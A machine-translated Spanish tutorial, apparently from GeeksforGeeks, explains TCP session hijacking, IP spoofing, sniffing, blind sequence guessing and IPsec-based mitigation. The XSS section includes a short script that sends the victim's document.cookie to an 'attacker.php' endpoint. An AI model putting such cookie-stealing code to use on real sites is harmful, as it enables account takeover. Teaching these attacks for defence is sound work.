Secuestro de sesión

¿Qué es el secuestro de sesión?
El secuestro de sesión TCP es un ataque de seguridad en una sesión de usuario a través de una red protegida. El método más común de secuestro de sesión se denomina falsificación de IP, cuando un atacante utiliza paquetes de IP enrutados de origen para insertar comandos en una comunicación activa entre dos Nodes en una red y disfrazarse como uno de los usuarios autenticados. Este tipo de ataque es posible porque la autenticación generalmente solo se realiza al comienzo de una sesión TCP.

Otro tipo de secuestro de sesión se conoce como ataque man-in-the-middle, en el que el atacante, mediante un sniffer, puede observar la comunicación entre dispositivos y recopilar los datos que se transmiten.

Diferentes formas de secuestro de sesión:

    Hay muchas formas de secuestrar sesiones. Algunos de ellos se dan a continuación:

    • Uso de rastreadores de paquetes

      En la figura anterior, se puede ver que el ataque captura la ID de sesión de la víctima para obtener acceso al servidor mediante el uso de algunos rastreadores de paquetes.

    • Cross Site Scripting (ataque XSS) El
      atacante también puede capturar la ID de sesión de la víctima usando un ataque XSS usando javascript. Si un atacante envía un enlace manipulado a la víctima con el JavaScript malicioso, cuando la víctima haga clic en el enlace, el JavaScript se ejecutará y completará las instrucciones realizadas por el atacante.

      <SCRIPT type="text/javascript">
      var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);
      </SCRIPT>

    • Suplantación de IP La suplantación de
      identidad consiste en hacerse pasar por otra persona. Esta es una técnica utilizada para obtener acceso no autorizado a la computadora con una dirección IP de un host confiable. Al implementar esta técnica, el atacante tiene que obtener la dirección IP del cliente e inyectar sus propios paquetes falsificados con la dirección IP del cliente en la sesión TCP, para engañar al servidor que se está comunicando con la víctima, es decir, el host original.
    • Ataque ciego
      Si el atacante no puede olfatear los paquetes y adivinar el número de secuencia correcto esperado por el servidor, se pueden probar combinaciones de número de secuencia de fuerza bruta.

    Mitigación

    Para defender una red con secuestro de sesión, un defensor debe implementar medidas de seguridad a nivel de aplicación y de red. Los secuestros a nivel de red se pueden evitar cifrando los paquetes para que el secuestrador no pueda descifrar los encabezados de los paquetes, para obtener cualquier información que ayude en la suplantación de identidad. Este cifrado se puede proporcionar mediante el uso de protocolos como IPSEC, SSL, SSH, etc. El protocolo de seguridad de Internet (IPSEC) tiene la capacidad de cifrar el paquete en alguna clave compartida entre las dos partes involucradas en la comunicación. IPsec se ejecuta en dos modos: Transporte y Túnel.
    En el modo de transporte solo se cifran los datos enviados en el paquete, mientras que en el modo de túnel se cifran tanto los encabezados del paquete como los datos, por lo que es más restrictivo.

    El secuestro de sesión es una amenaza grave para las redes y las aplicaciones web en la web, ya que la mayoría de los sistemas son vulnerables.

    Fuentes;

    Este artículo es una contribución de Akash Sharan . Si te gusta GeeksforGeeks y te gustaría contribuir, también puedes escribir un artículo usando write.geeksforgeeks.org o enviar tu artículo por correo a review-team@geeksforgeeks.org. Vea su artículo que aparece en la página principal de GeeksforGeeks y ayude a otros Geeks.

    Escriba comentarios si encuentra algo incorrecto o si desea compartir más información sobre el tema tratado anteriormente.

Publicación traducida automáticamente

Artículo escrito por GeeksforGeeks-1 y traducido por Barcelona Geeks. The original can be accessed here. Licence: CCBY-SA

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *